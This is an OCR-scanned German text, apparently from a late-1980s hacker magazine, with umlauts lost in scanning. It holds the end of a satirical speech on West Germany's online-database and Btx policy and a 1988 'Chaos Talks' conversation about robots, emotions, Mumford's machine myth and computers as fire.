Mllemann mit einem weiteren starken Hoffnungstrger im Kabinett, dem Postminister, verbndet: Die beiden wollen zwei Ziele miteinander verbinden - der heranwachsenden Jugend frhzeitig Diskotheken zu vermiesen und eine hrige Btx-Kundschaft heranzuzchten. Zu diesem Zweck werden in Spielhallen die Flipperksten durch Btx-Gerte ersetzt, auf denen man im Rechnerverbund THE SOURCE und anderen Hosts online Black Jack und U-Boot-Schieen spielen kann. Um sich fr dieses Geschft sachkundig zu machen, hat Minister SchwarzSchilling - wie knnte es anders sein - sich auch von einem nachgeordneten Institut, dem Wissenschaftlichen Institut fr Kommunikationsdienste, eine Angebotsstudie durchfhren lassen. So wei nun auch die Post endlich, da es auer Btx noch einige andere elektronische Informationsdienste gibt, die in der Postwerbung bisher unbercksichtigt blieben. Diese Studie wird dem Minister und seinem Produkt Btx freilich keine schlaflosen Nchte bereiten: Die unliebsame Konkurrenz hlt er sich unschwer durch lange Lieferzeiten fr Modems und DATEX-Anschlsse sowie durch eine Btx-orientierte Gebhrenordnung vom Leib. Frohe Botschaften kommen auch von Norbert Blm: Er hat in den Koalitionsgesprchen eine Lockerung des Nachtarbeitsverbots fr Online-Searcher durchgesetzt, weil nachts die amerikanischen Hosts bessere Responsezeiten bieten. Ferner soll Arbeitslosen durch eine lngere Zahlung von berbrckungsgeld die Grndung einer selbstndigen IVS erleichtert werden. Im Bereich der Auen-, Friedens- und Sicherheitspolitik ist Auenminister Genscher derzeit bemht, eine einheitliche Haltung der Bundesregierung zu erreichen: Um die amerikanischen Verbndeten nicht zu verrgern, strebt man eine doppelte Null-Lsung an: Die amerikanischen Langstreckenwaffen vom Typ DIALOG und MEAD drfen weiterhin unser Land unter ihre Fittiche nehmen und zeigen, wo es lang geht. Als Gegenleistung wird die Bundesrepublik sich auf Kurzstreckendienste geringer Reichweite beschrnken. STN bleibt hierbei auer Betracht, weil es den chemischen Waffen zuzurechnen ist und strategisch von Columbus, Ohio gesteuert wird. FIZ TECHNIK wurde vorsorglich rechtzeitig eidgenssisch neutralisiert. Das Hostpotential wird also weitgehend eingefroren, insbesondere in qualitativer Hinsicht. Stattdessen wird im Lande krftig konventionell aufgerstet.

In diesen Bestrebungen wird die Bundesregierung tatkrftig durch die Bundeslnder untersttzt, die aus dem Verfassungsgebot der Kulturhoheit auch eigene luD-Gestaltungsrechte herleiten. Der Prototyp des Hosts mit geringer Reichweite wurde vom Freistaat Bayern in Straubing errichtet. ber kurz oder lang wird es jedes Bundesland als Prestigeangelegenheit ansehen, einen echten Host zu betreiben. Wo es nicht zum Grorechner reicht, behilft man sich mit bescheideneren PC-Lsungen; auch daran kann man ja einige Jahre tfteln. Insbesondere den Kultusverwaltungen scheint es groe Befriedigung zu verschaffen, in den Hochschulen zahlreiche Minidatenbanken entstehen zu sehen und zu finanzieren, entgegen dem Grundsatz der Wirtschaftlichkeit in der Verwaltung. Und selbst die Landwirtschaftsminister knnen kaum der Versuchung widerstehen, jeweils eine eigene Wirtschaftsdatenbank aufzubauen, und zwar fr die Exportwirtschaft, in der blauugigen Erwartung, Japaner oder Amerikaner wrden darin Geschftskontakte suchen. Unter dem Tisch reiben sich die akquisitionsfreudigen Hard- und Softwarehuder die Hnde, denn ihnen ist diese Art von Markt gerade recht. So entstehen derzeit in unserem Land Hunderte von elektronischen Schrebergrten, die sich von den traditionellen Papierdiensten nur dadurch unterscheiden, da sie kostspieliger sind. Ein Nutrzen wird allenfalls innerhalb der eigenen vier Wnde gesucht: Hessische Datenbanken fr Hessen, niederschsische fr Niedersachsen. Gegen diese elektronische Zersiedelung unseres Vaterlandes war die Aufteilung des Reiches in 16 FIZ in den 70er Jahren eine vergleichsweise harmlose Angelegenheit. Die Studenten in unserem Land bleiben indessen von den echten Online-Errungenschaften weitgehend abgeschirmt. luD-Fachvorlesungen gibt es nur an einigen wenigen Pltzen. Der Normalstudent lebt weiterhin aus dem Karteikasten in der UB. Haufenweise werden jetzt Lehrsthle fr Informatik oder gar Wirtschaftsinformatik eingerichtet, kaum einer hingegen fr Informationspraxis und -management. Die Berufenen sind Profis in Hard- und Software, aber Laien im weltweiten Informationsgeschft. In den Behrden und Unternehmen setzt sich das Dilemma fort: Die Betriebsbuchhaltung erfreut sich fortgeschrittener EDV-Untersttzung, wo kein Aufwand gescheut wird. Der Regierungsrat oder der Bereichsleiter, der mit denselben Endgerten Online-Dienste nutzen mchte, mu hingegen um seine weitere Karriere frchten. Bei der innerbetrieblichen Informationsversorgung befinden wir uns noch in den frhen 70er Jahren; trotz der vielleicht 1.000 Unternehmen, die bereits die Zeichen der Zeit erkannt haben. Ein bemerkenswertes Beispiel fr diese Art Schrebergartenelektronik zeigen auch die 70 Industrie- und Handelskammern im Lande, wenn man einmal von den IHK-Ausgliederungen OTTI, tbr und TVA absieht; Die ansonsten eingerichteten Datenbankdienste fhren berall eher ein Schatten- und Alibidasein, als da sie dem IHK-Auftrag der regionalen Wirtschaftsfrderung gerecht wrden. Man spart zwar nicht an festlichen Ansprachen zum technischen Fortschritt, wie gestern abend, als die Deutsche Gruppe der Internationalen Handelskammer im Intercontinental Hannover ein feierliches Bekenntnis zum weltweit gespeicherten Wissen ablegte, mit Abendessen zum Preis von 100 DM entsprechend 0.3 Std. Anschluzeit bei einem Host. Zum Cocktail durfte ChefSearcher Klaus Engelhardt die Gste am Keyboard entertainen. An der Basis sieht es jedoch anders aus: Man scheint gerade Wirtschaftsdatenbanken und ihre privaten Anbieter wie die Pest zu frchten, weil man meint, die Mitglieder wrden sich mit ihren Informationswnschen von den Kammern abwenden, wenn das so weiter geht. So ringt man denn auch mit Mhen und seit Jahren um eine eigene Firmendatenbank: Die Stammdaten sind lngst gespeichert, dienen sie doch der Ausstellung der Beitragsrechnungen. Der darauf aufbauende Herstellernachweis mit derzeit 40.000 Unternehmen kann bisher keinem etablierten Online-Firmennachweis Konkurrenz bieten. Dieses hindert die Kammern nicht, in ihren Mitgliedsblttern so zu tun, als ob hier erstmals eine deutsche Firmendatenbank entstehen wrde, wie es sie in der Welt noch nicht gibt, unter Verschweigung derjenigen Dienste, welche einige ihrer Mitgliedsfirmen seit Jahren anbieten. Man feiert es als Erfolg, da die Kammer Pforzheim nun im Bestand der Kammer Bodensee-Oberschwaben recherchieren darf, ohne da vorab die Zustimmung der dortigen Geschftsfhrung eingeholt werden: mu, was vor geraumer Zeit noch Sitte war. Vorerst sollen auch nur Kammern das Privileg haben, im bundesweiten Kammerinformationssystem zu recherchieren, denn nur so ist gewhrleistet, da der Mittelstndler weiterhin erst die Kammer bitten mu, ihn mit den gewnschten Informationen zu versorgen. Eine Implementierung auf einem ffentlich zugnglichen Host drfte auf absehbare keine Mehrheit finden, mgen auch einige mutige Kammern ausscheren und sich verselbstndigen.

Wenn also die Kammern eine derart restriktive und eigenntzige Informationspolitik betreiben, braucht man sich nicht zu wundern, wenn der berwiegende Teil der Mittelstndler seine Informationen weiterhin bei Sprechtagen oder Jahresempfngen zu beschaffen sucht. Jedes Land hat eben den Informationsmarkt, den es verdient. Was hier ber die Kammern gesagt wurde, gilt sinngem auch fr die berwiegende Zahl der Fachverbnde. Auch hier kann sich das Verbandsestablishment nur schwer mit dem Gedanken anfreunden, die Mitglieder knnten womglich eines Tages die Verbandsinformationen nicht mehr ntig haben. Kammern und Verbnden wird es ebenso wie den Unternehmen selbst gehen: Wer bei der Informationsversorgung nicht alte und neue Medien zum Einsatz bringt, wird alsbald im Dunkeln wandeln. Die Wirtschaftsverbnde tten gut daran, den Unternehmen zu zeigen, wo es lang geht, statt die guten alten Zeiten zu verteidigen. Sie knnten hier von einigen Kreditinstituten viel lernen, die dabei sind, durch ein Angebot attraktiver Informationsdienstleistungen die Firmenkunden nher an sich zu binden. So wird also Auenminister Genscher noch geraume Zeit warten mssen, bis die deutsche Wirtschaft in der internationalen Online-Informationsweit den Stellenwert einnimmt, der ihr als fhrender Industrienation zukommt. Er hat freilich bei seinen diplomatischen Bemhungen um mehr Online-Resonanz in der Welt bereits einen achtbaren Erfolg errungen: Fr viele unbemerkt hat Papst Johannes Paul II bei seiner diesjhrigen Osteransprache den zahlreichen Onlinern auf dem Petersplatz und in aller Welt den Segen "urbi, orbi et fizibus" nicht nur in allen Landessprachen erteilt, sondern auch in STAIRS: Er sprach "Frohe ADJ Ostern". Diese frohe Botschaft wollen wir auch heute aus dieser Frankfurter Messehalle in unserem Herzen mit nach Hause tragen. Die Zuversicht, da es auch am deutschen Online-Markt nur aufwrts gehen kann, wird auch von FIZ TECHNIK und DATASTAR geteilt. Johannes Paul II (Rom), Peter Genth (Frankfurt) und Heinz Ochsner (DATASTAR) stimmen darin berein, da den Onlinern die Zukunft gehrt. Der Rechner in Bern hat gengend Kapazitt, um auch noch den im Aufbau befindlichen Holy Ghost Host des Vatikans aufzunehmen, der nicht nur die Bibel online anbieten wird, sondern auch elektronische Ferntaufen, Fernhochzeiten und Fernbeerdigungen. So werden wir dort in Krze eine postindustrielle Kultsttte haben, die uns fortan im Glauben an den groen Durchbruch strken wird. In diesem Sinne rufe ich wieder allen Online-Brdern und -Schwestern zu: DEUTSCHLAND LOGON!

Chaos Talks
Ausschnitte aus einem Brainstorming vom 9. 3.1988
v: Vic (Genie) - w: Wau (Wau) - p: Poetronic (Dichter)

Grippers made from a soft gel and wrapped in a rubberlike membrane will soon give robots the sensitivity of human hands

w: Gibson beschreibt in "Neuromantics" konsequent die Geschichte, da man sich am Rckenmark einstpselt. Wenn man sich da in eine Datenbank reinhackt, die einem nicht zusteht, dann ist man gehirntot. Man ist nicht ber die Tasten verbunden, sondern ber den Stpsel. p: d, wenn man da nicht kompatibel ist. w: Aber so auf der Ebene der ganzen kleinen Computer - In der "Byte" war vor acht Jahren der Kleincomputer drauf, den du dir um die Hand schnallen kannst, als Uhr. Da war auf der

Uhr zu lesen "Insert disc" und da gab's eine pfenniggroe Diskette zum Reinschieben. Das auf der Titelseite, als Grafik. Aber klare Vision. Der nchste Punkt: Der Computer zum Aufklappen. Den feuert man in die Ecke, dann entfaltet er sich, stellt die Beinchen hoch, da entfaltet sich ein Drucker, da entfaltet sich der Bildschirm.. p: Eine Dsentrieb-Maschine. Daniel Dsentrieb baut ein Campingzelt, das so klein ist. Wenn du an der Schnur ziehst, hast du ein dreistckiges Haus mit Badewanne.

w Aber auf der Ebene 'Kofferklappelemente' und 'Ausziehen' lt sich wohl einiges machen. In dem Format eines Koffers mte das in absehbarer Zeit unterzubringen sein. p- Ich denke, es wird darauf hinauslaufen: Kittler hat geschrieben "Der Computer wird den Begriff 'Medien' einkassieren, weil er alle Medien in sich vereinigt". Da wird es irgendwann nur noch ein digitales Medium geben. Es herrscht doch eine Unzufriedenheit darber, da du heutzutage die einzelnen Medien noch getrennt hast. Man wnscht sich eine Art Zentralstation, wo du Fernseher, Radio, Video, Audio, Rechner vollkompatibel in einem Kasten hast. Einen Universal-Player. w: Und dann soll er wie ein Hund neben dir herrollen. p- Gut, dann knnen wir gleich weiterphantasieren. Du kannst noch einen Staubsauger einbauen, das Ding kann 'Guten Tag' sagen, und du kannst ihm wie einer kleinen Cruise Missile beibringen, sich in deiner Wohnung zurechtzufinden. v: Kannste nichts verdienen dran. w: Mir geht's momentan nur um's Phantasieren.. p- Vic hat insofern recht, als die Kreativitt in bestimmten Teilen schon auch vom Erwerbstrieb gesteuert wird. w: Aber irgendwann wird's doch die Maschinen geben. v: Das ist die Frage, ob es das geben wird. p: Nun, wenn ein Markt da ist.. v: Aber es macht sie keiner. w: Wieso soll man sie denn nicht machen. Das versteh ich nicht recht. p: Kann man sie berhaupt schon machen? Das ist die Frage. v: Ja, man kann sie machen. p: Dann hast du 'ne VAX im Wohnzimmer rumfahren, sowas. w: Ja. Mindestens. Dann lieber so'n Transputerchen. Wenn sich das dann noch teleskopisch ausfhrt und so., auf der Strae hinterherfhrt..

p: Solche Robotergibt's ja schon. A b e r d a s s i n d eher Partygags. Ich hab' auf der B u c h m e s s e einen gesehen. Der war auch nochgefaked, mit einer Videokamera drin. Da sa einer in e i n e m Verschlag und hat den ferngesteuert. v: Die Videokamera war auch nurFake. D e r T y p stand daneben. Ich kenn die Dinger. p: Meinste, man kann da schon differenziertere Dinger bauen? w: Also, der Atari ist die billigste Lsung.. p: Der fhrt doch nicht in der Wohnung r u m . w: Das ist ja das Programm. Das Problem ist, da solche Sachen nicht kuflich zu e r w e r b e n sind, aber aus handelsblichen Bauteilen z u sammengesetzt werden knnen, p: Was knnte man sich denn da vorstellen? I c h meine, es wr schon witzig, wenn man so e i n universaldomestiziertes Haustier htte. S o l l das alle Arbeiten, die sonst einer H a u s f r a u bertragen sind, bernehmen? Soll das mehr knnen? Soll das Sympathie erwecken? | C h knnt mir schon vorstellen, mich mit so e i n e r Maschine anzufreunden. v: Da man sowas im Haushalt brauchen k a n n interessiert mich gar nicht. Was mich d a r a n vielmehr interessiert, sind die psychologischen oder philosophischen Aspekte. Das find oh interessanter. Ob das Ding fhrt oder nicht i t mir vllig egal. ' lst p: Dich interessiert also ein HIRN. v: Mich interessiert nur das Hirn. w: Das mobile Hirn. v: Braucht nicht mobil zu sein. Das kann a u c h in der Ecke liegen. Mich interessiert nur d a s Hirn. Seit vielen, vielen Jahren fasziniert m i c h der Gedanke der Zusammensetzung der E m o tionen. Und da hab ich so ein paar verschieden Hypothesen hingestellt.. p: Sag mal. Ich hab auch eine Hypothese. v: Die eine Hypothese ist, da das eine Form von komplexer Logik ist. Da also Gefhl komplexe Logik ist. w: Das ist Logik auf der Ebene der Musterer. kennung. Aber noch nicht erkannt. p: Mein Konzept von Emotionen ist: Ich nehm G mal den biologischen Organismus. Jedes Or-

gan sendet dauernd eine Zustandsmeldung aus in Form chemoelektrischer Signale, Botenstoffe, sowas. In Form von Stofflichkeiten. Diese Emanationen der einzelnen Krperteile oder Organe - wenn du es ganz rationalistisch ohne Geist und Seele siehst - ergeben das, was man so 'emotionale Grundlage' nennt. Das Gefhl. v: Mein Ansatz ist ein anderer. Ich bastel was zusammen, was fhlt. p: Dazu mut du dir doch erstmal darber klar sein, was Gefhle sind. v: Da ist eben die eine Hypothese, das sei eine komplexe Logik, die gar nicht soo komplex ist, aber komplex genug, um vom Vordergrundverstand erfat werden zu knnen. p: Nimm als Modell deine eigenen Emotionen. v: Meinetwegen. Aberwarum soll ich., ich mein, ich hab mein Modell doch schon gefunden. p: Ja, 'ne komplexe Logik. Aber von was..? v: Wie - von was? p: W i e - w i e von was? (Heiterkeit) v: Was soll die Frage? 'Ne komplexe Logik ist 'ne komplexe Logik. p: Logik ist 'ne Denkfunktion. 'Ne Gehirnfunktion. Keine emotionale Funktion. Ich wei nicht, ob das Modell bertragbar ist.. v: Naiin..! Das hat mit Mustern berhaupt nichts zu tun. Du kommst da viel zu sehr von der deduktiven Seite her. p: Ich komm von der sprachlichen Seite. Die Sprache gibt auch ein Modell von Emotionen. v: Nein. Warum verbeit du dich auf dieses Scheimodell von Emotion. Stelldireinfach mal vor, ich will 'ne Emotion erklren. p: Das soll ja angeblich immer wieder mal versucht werden. v: Gut. p: Sie stehen auf meinem Fu. Es tut mir weh. So die Art, nicht? v: Nein. Auerdem bringt das nichts, wenn du

mir dauernd zwischenredest., p: Ich hr schon auf. v: ..sondern wenn ich mir berlege: Woraus besteht Emotion? Wenn ich mir Gedanken mache darber: Woraus knnte Emotion bestehen? Dann ist mir eine Hypothese eingefallen: Sie knnte aus Logik bestehen. Das nehmen wir einfach mal so als Hypothese hin. So. Diese Gesetze der Logik kann man ja normalerweise ganz gut erfassen, mit Hilfe von Computern, oder selber drber nachdenken oder wasweiich. Man mte daher eigentlich von der Eingabe zur Ausgabe kommen. D.h., man mte diese Logik nachverfolgen knnen. Dadas aber uerst schwierig ist, kann man diese Idee weiterspinnen und sagen: Die ist eben ein bichen komplizierter. Die kann man nicht einfach so durchrechnen. Und - wenn ich mir jetzt die richtigen Menschen ansehe, dann kann man manchmal von bestimmten Eingangsparametern auf die Ausgangsparameter schlieen. p: Das heit, wenn ich jemanden wie Kurt Waldheim sehe und sein Gesicht sehe, dann kann ich annehmen, da er hinterhltig ist. v: Naiin! Wenn ich was reintue, dann kommt was raus. Das Verarbeitungsprogramm ist Emotion, okay. Also: Eingabe - Emotion Ausgabe, das ist mal so das Modell, das grobe. w: Wenn ich 'mal so zurckgehe, dann ist also das jeweils gemeinsame historische Moment das bertragen der jeweils fortgeschrittensten Technologie auf det Janze. Zu der Zeit, wo sie die Uhren hatten, da war die Erfindung des Perpetuum Mobile angesagt. Und da wurden dann Menschen, Maschinen und Puppen, gebaut, mit hervorragend natrlichen Kurvenbewegungen, mechanisch relisiert. Die sehen echt aus. Wenn ich mir heut einen Roboter anschau, dann ist der echt Scheie. Da war ein Menschenbild dahinter, das auch stark uhrwerkgesteuert war. p: Hast du 'mal Mumford gelesen, "Der Mythos der Maschine"? Es ist mir schwer vorstellbar, wie ein einzelner Mensch in einer Lebenszeit so viel an Gesamtwissen zusammentragen kann, aus smtlichen Natur- und Geisteswissenschaften und der Literatur, und das noch verarbeiten kann. Das Buch geht vom aufrechten Gang bis zur Mondrakete, wobei er nebenbei noch wissenschaftliche Ansichten revidiert, z.B. da in den Altertumswissenschaften bisher viel zu gro es Augenmerk auf die Artefakte gelegt worden ist, die materiellen Funde. Was eigentlich passiert ist, ist in keiner Versteine-

rung enthalten, z.B. das Ritual. Oder rauszufinden, wie man eine Kaffeebohne richtig behandelt, damit sie antrnt. Wenn du Urmensch bist stehste da vorerst im Wald. Das mut du erstmal rausfinden, und das ist eine gewaltige Leistung, bedeutender als irgendwelches Steinchenklopfen. . . Oder die Zeit. Heutzutage stehen in jedem Zimmerdrei Digitaluhren rum. Herauszufinden, wie du einen Kalender machst.. Ich stell mir manchmal vor, da einige hunderttausend Jahre lang Leute, die nachts Schwierigkeiten mit dem Einschlafen hatten, in die Sterne geguckt haben. Irgendwann mu jemandem aufgefallen sein, da sich da was ndert. Irgendwann viel, viel spter mu jemandem aufgefallen sein da sich da regelmig was ndert. Und dann mu sich jemand gesagt haben: das wollen wir doch jetzt mal festhalten. Oder wenn du dir berlegst, was fr eine Grotat die Entwicklung von einem Gef ist, "nem Krug Dazu mut du vorausschauen knnen, das kann kein Tier. Ein Gef ist etwas, wo noch nichts drin ist. Da wird erst etwas reinkommen. . Das Hauptthema in dem Buch ist die Maschine. Wann ist die Maschine entstanden, der Mythos der Maschine? Mumford sagt: Die erste Maschine ist zusammengebaut worden im alten gypten, in der Pyramidenzeit. Das waren die ersten Pyramidenbaumeister, die diese Logistik bewltigt haben und eine Maschine aus menschlichen Teilen zusammengesetzt haben. Diese ganze Transportproblematik, die Bautrups, die Leute in den Steinbrchen, die Versorgung. Das war das erste Mal in der Menschheitsgeschichte, die erste Maschine. Nach und nach sind dann im Lauf der Geschichte die unzuverlssigen menschlichen Teile der Maschine durch mechanische ersetzt worden. , , , Und da man heute - ich hab den Mumford noch ein bichen weiterphantasiert - da man heute viele Parallelen findet zum Pyramidenzeitalter Z.B. bei einem Atomkraftwerk, wie da mit den Tricks der Bronzezeitgtter gearbeitet wird Der Mensch versucht, dem Sonnengott das Werkzeug aus der Hand zu nehmen. Diese kontrollierten Energien, die auf der Sonne vor sich gehen, zu zhmen und zu bndigen. Da unsere Priesterkaste, die Wissenschaftler und Technologen, das will. w In der Bibel heit das 'Das eherne Meer'. Beim Tempelbau des Knigs Salomon. Da ist der Gu schiefgegangen, die Zugabe von Wasser erfolgte nicht wie geplant. Das ganze haben noch Gesellen versiebt, die dem Meister die neue Braut nicht gegnnt haben, und da isser dann in dieses flssige Meer hineingetaucht

und wieder zurck. Also, flssiges Metall v o n dieserGrenordnung.so wie ich m i r d a s d a n n nach dieser biblischen Erzhlung v o r g e s t e l l t habe, das hatte ich so in der Birne bei T s c h e r nobyl. Da stehen schon sehr starke V i s i o n e n drin. p: Das anschaulichste Bild, das Mumford v e r wendet, Ist der Vergleich zwischen a l t g y p t i schen Pyramiden und Mondraketen. B e i d e s sind Bauten einerGrotechnologie. Das I n n e r e einer Raumkapsel ist gleichzusetzen mit d e r innersten Kammer einer Pyramide, wo a u c h d i e miniaturisierte Ausrstung fr eine Reise in d i e Unendlichkeit steht. Und wenn du 'ne M u m i e und 'nen Astronauten vergleichst, fallen d i e hnlichkeiten schon rein optisch auf. B e i d e s sind Menschen in einem Zustand h c h s t m g licher Reduktion der Lebensprozesse, was n o t wendig ist, um solche auermenschlichen B e reiche zu erfahren. Ein Astronaut trainiert j a h relang, seine Lebensfunktionen auf g r t mgliche Weise zu reduzieren, um diesen B e dingungen, die im Raum herrschen, e n t g e genstehen zu knnen. Es gibt ja auch nix Irrationaleres als die V o r stellung, auf den Mond zu fliegen. Das ist d a s unwirtlichste, menschenfeindlichste., das w u te man schon vorher, da da die Klte ist, u n d Steine. w: Also, an der Hell-Dunkel-Grenze das Z e l t aufzuschlagen, das fand ich schon interessant p: Klar hat das eine gewisse Poesie. Ich meinbei den Pyramiden versteht heute auch k e i n e r mehr, warum man die gebaut hat. ' Um nochmal zurckzukommen: Was ist d i e Konsequenz aus der fortschreitenden C o m puterisierung? Die Idealvorstellung von der V o f lautomatisierung? Es ist halt sehr die Frage, o h wir das wollen. Einzelmedien bringen e s ' m i t sich, da, wenn du z.B. fotografierst, die B e reitschaft nachlt, Bilder mit Aufmerksamkeit wahrzunehmen und zu behalten. Wenn d ^ dauernd fotografierst, verlierst du dein visuelle^ Gedchtnis. w: Medialer Analphabetismus. p: Wenn wir nun also grob gesagt mit d e n Computern den Geist nach auen verlegen, oder das Bewutsein, um das alles von Automaten erledigen zu lassen - da wir vielleicht im Endzustand ausgeleert, mild lchelnd und haschischrauchend in der Ecke sitzen, und d i e Rechner treiben die Kulturentwicklung voran. Ich mein', ich hab mich schon mal gefragt, ob das dieses Gefhl, zu leben, ist: Diese leichte., auch wenns einem gut geht, wenn du grade

gevgelt hast, gegessen hast und die Sonne scheint, trotzdem dieses leichte Gefhl von Last, von Anstrengung. Diese Anforderung, die Kulturgeschichte der Menschheit voranzutreiben, auch wenn du nur hustest. In diesen ganzen mikroskopischen Einzelheiten. Es ist sehr die Frage, ob Rechner sowas jemals machen knnen, ob selbstmodlfizierende Systeme wie die biologischen Organismen in digitaler oder elektronischer Form mglich sind. Und dann: Wir scheiden uns selber aus der Entwicklungsgeschichte aus. Wir sitzen daneben und schauen, wie die Apparate sich weiterentwickeln und sind froh, da wir nichts mehr machen mssen. Dann wird's uns irgendwann nicht mehr gaben. Oder wir werden 'ne Art Parasiten der Maschinen. Was ist deine Sicht von der Zukunft der Computerei? w: Zugang zu Datenbanken und Wissen. p: Aber, Alter, schaut es nicht im Augenblick eher umgekehrt aus? Da wir Wissen verstecken in Datenbanken, vergraben? Wissen, das keiner mehr suchen will oder kann, entweder weil es zu teuer ist, oder zu kompliziert? w: Es ist einfach zu teuer aus politischen Grnden. Die Kommunikationspreise sind um den Faktor 1000 berteuert. p: Auch wenn's nix kosten wrde. Wenn du nicht mehr weit, was du berhaupt suchen kannst.. w: Das Suchen wird knstlich behindert von den Staaten. Als die Amis hier einmarschiert sind, haben sie nicht nur das Patentamt ausgerumt - da sind nur noch Mikrofilme da - , sondern es ist doch so, da jeder Staat sein Patentwissen so gut htet, da jeder Staat fr sich selber ein so absurdes Ordnungssystem hat, mit dem man zwar leben kann, mit dem man aber nichts finden kann. p: Ich hab mir schon mal berlegt, das wr eine Mglichkeit zur Arbeitsplatzbeschaffung, wenn die einzelnen User in den Datenbanken nicht qualvoll x Retrievalsprachen lernen mten, sondern du nicht mehr an eine automatische Zutrittsmeldung kommst, sondern an einen Portier, einen richtigen Menschen. Wie an der Hotelrezeption. Ein Navigator. v: Gibt's schon. p: Da da einer sitzt, den du antickern kannst? v: Nicht nureiner. Da sitzt ein ganzesTeam. Bei "Delphi". Die sind immer da, und wenn du

irgendwie Probleme hast, kannst du die direkt anquatschen. p: Ach ja, das haben die doch von vornherein gemacht. So'n Operator. v: Nein, das sind keine Operators. Das sind Leute aus dem kultur- oder sprachwissenschaftlichen Bereich, und wasweiich wofr. Fachleute. p: Die kennen sich auch mit den ganzen Retrievals aus? v: Manchmal machen die auch gar kein Retrleval. Manchmal schlagen die ein Buch auf. p: Man glaubt es kaum. w: ..oder telefonieren.. v: ..oder antworten einfach so. Find ich 'ne wirklich gute Idee. Das Orakel von Delphi ist ja schon in der griechischen Sage nicht zu kurz gekommen. p: Ich hab' unlngst wieder ein Urbild vom Monitor in den alten Mythen gefunden. Alexander der Groe hatte angeblich einen 'Weltenspiegel', durch den er auf alle sieben Kontinentegleichzeitig gucken konnte. Tolle Vision. Und alles Tun seiner Feinde beobachten. So 'ne Art Sphsatelliten hatte der schon. Gabs schon im Mythos. Ist schon komisch, was man da an Bildern wiederfindet. Kennst du das: wenn du einen Scheit Holz im Feuer hast, diesen Scheit siehst, wenn das Feuer schon runtergebrannt ist und der noch glht. Du siehst keine Flammen mehr, nur noch dieses glhende Holz, und die Rinde springt in kleinen Blockmustern auf. Wenn du drei Minuten abmeditierst - das geht mir jedesmal so - , dann siehst du exakt, auch durch diese leichten Windflge in der Glut, das Bild einer nchtlichen Grostadt im 20. Jahrhundert, wie man's jetzt aus dem Flugzeug sehen kann. Manchmal denke ich mir: Sind das die Dinge, die Bilder, die die Kultur vorantreiben? Wenn da Steinzeitmenschen vor dem Feuer gesessen sind und das gesehen haben, und dann irgendwann 5000 Jahre spter ist das Bild realisiert? w: Das beantworte ich insofern mit Ja, als: Hast du mal die Augen eines Schmiedes gesehen? p: Noch nicht bewut. w: In ihnen lebt dieses Feuer. Berufsbedingt. Von daherauch die Rolle des Schmiedes in der griechischen Sage. Ich mein', es ist ja nicht nur

so, da man dem Menschen das Feuer bringen mu, sondern man mu ja auch was damit machen. Einfach nur 'ne Fackel irgendwo hinstellen ist ein bichen lahmarschig. Und fr sowas wie die Bronzezeit meinetwegen bedurfte es eines Schmieds. Und das Gedicht von der Glocke - also: Schmied - Kunstschmied Glockenschmied. Glockenschmied: Besondere Probleme, besondere Situation, weil: Ich brauch einfach mal fnf Kilo Gold und zwlf Kilo Silber, und wenn ich das nicht kriege, dann klingt das halt nach Blech. Und dann sind da ungeheure logistische Probleme zu bewltigen. Aus irgendwelchen Ruten, mit Ton zu verschmieren und die Suppe da reinzukippen. Ein Versuch. p: Da gibt's brigens in Kairo heutzutage noch einen schnen Beruf, und zwar gibts in den Basaren eine Strae, da sitzen die Kupferschmiede, eine, da sitzen die Goldschmiede brigens: wenn du dir da Schmuck machen lt, das kostet nur den Goldpreis - , und da gibt's einen Typen, der kommt um vier Uhr morgens und bringt die Glut. w: Auf dieser Produktionsebene, da kommt davor der Khler, und der Schmied ist einfach all-in-one-production, die Reste sind dann alles so verfeinert.. Ich denke, da es genau dieses Licht ist. Wenn du damit umgehen kannst, hast du irgendwo erstmal keine Angst. p: Geht's nicht beim Computer letztlich immer noch um die Beherrschung des Feuers? Es ist doch so: Man knnte sagen, es war der dramatische Punkt in der Menschheitsgeschichte, die Beherrschung des Feuers. Und das geht durch die ganze Geschichte. w: Computer ist die Beherrschung des Lichts. p: Ja, pa auf. Irgendwann ist das Feuer arbeitsteilig gemacht worden. Die Wrme ist abgespalten vom Feuer, und das Licht. Elektrischer Strom. Da ist 'ne elektrische Heizung, du hast kein offenes Feuer mehr. Das Licht - fr mich ist immer der Monitor gleichzusetzen mit dem Lagerfeuer. Es gibt doch diesen ganz archaischen Eindruck, wenn du ins Feuer schaust. Da kann man stundenlang reinschauen. Du siehst immer wieder Bilder, Visionen, irgendwas passiert, du bist fasziniert. Fast dieselbe hypnotische Faszination gibt's beim Ferseher respektive Monitor. Nur, es sind kalte Bilder, kaltes Feuer. Und die Phantasien, die, wenn du vor 'nem Feuer sitzt, vor dir aufsteigen, das ist soweit rationalisiert worden oder "bequemer" gemacht worden, da man heutzutage die Phantasiebilder schon fertig ge-

liefert kriegt. Vordem Feuer hast du noch die Freiheit, deine eigenen Bilder zu entwickeln. Und am Computer gehts auch wieder. vic: Das Interesse am Computer hat nichts mit dem Licht zu tun. Es ist mir wurscht, wo das rauskommt, auf 'nem Display, auf 'nem Drucker. Ob das ein paar Lmpchen waren, die da aufgeleuchtet haben, oder ob das irgendein Streifen ist, oder Lcher drin.. p: Es ging dir schon um den Output. v: Aber das hat berhaupt nichts mit dem Licht zu tun, weil das Licht vllig im Hintergrund steht. Es ist die geistige Verbindung, die ber jede beliebige Schnittstelle gehen kann. Wenn ich blind gewesen wr, dann htt ich's eben gefhlt. Oder gehrt. w: Das bezweifle ich. Weil auf der Ebene des Fhlens kommst du nicht weit. Das Auge ist das Werkzeug zum berschreiten von Entfernungen. Ich will jetzt nicht sagen., das Riechen z.B da riechste Molekle, das ist die Feinheit der Auflsung. Das Schmecken: schmeckste Molekle. Das Hren ist auch so verflucht fein.. p: Wutest du, da das Wort 'Ereignis' von 'Auge' kommt? Erugnis. v: Ist ja wundervoll.. w: ..die grte Bitdichte.. v: ..ja, die grte Bitdichte. Aber es kann ber jede irgendwie geartete Schnittstelle gehen. Es ist vllig egal, welche Bitdichte die hat. Mit der einen geht's ein bichen besser und mit der anderen geht's ein bichen schlechter. w: Ja, bei 'ner langsameren Bitdichte dauert es eben ein paar Jahrmilliarden lnger, bis sich Intelligenz entwickelt hat. v: Das ndert ja nichts., jetzt sind wir schon wieder bei einem vllig anderen Thema. Ich wollte mich nur gegen die uerung wehren da das was mit Feuer oder mit Licht oder sonstsowas zu tun hat, weil's einfach Unsinn ist. Es kann auch ein Drucker sein. w: Ich hab blo historisch diese Bitdichte reingebracht. Und damit einen Erkenntnisschritt auf der organischen Seite ermglicht.

!iJ

DONNERSTAG,

8.10.1987

taz hamburg

ANZEIGE

2 3

